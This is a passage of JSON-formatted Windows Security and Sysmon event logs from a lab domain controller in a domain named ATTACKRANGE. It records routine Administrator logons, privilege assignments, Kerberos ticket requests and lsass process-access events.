Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x11AFE1\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{A9E384E4-1451-931F-58CE-E6B791FBEAF3}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x11afe1","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{A9E384E4-1451-931F-58CE-E6B791FBEAF3}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220731,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x11AFE1\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x11afe1","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220732,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220733,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{A9E384E4-1451-931F-58CE-E6B791FBEAF3}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{A9E384E4-1451-931F-58CE-E6B791FBEAF3}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220734,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{A9E384E4-1451-931F-58CE-E6B791FBEAF3}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{A9E384E4-1451-931F-58CE-E6B791FBEAF3}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220735,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x11B201\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{A9E384E4-1451-931F-58CE-E6B791FBEAF3}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x11b201","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{A9E384E4-1451-931F-58CE-E6B791FBEAF3}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220736,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x11B201\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x11b201","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8537,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.006\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-22D1-5F25-0000-0010A6BE1100}\r\nTargetProcessId: 3408\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.006","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-22D1-5F25-0000-0010A6BE1100}","TargetProcessId":"3408","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8538,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.006\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-22D1-5F25-0000-0010A6BE1100}\r\nTargetProcessId: 3408\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.006","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-22D1-5F25-0000-0010A6BE1100}","TargetProcessId":"3408","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8539,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.053\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.053","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220737,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication 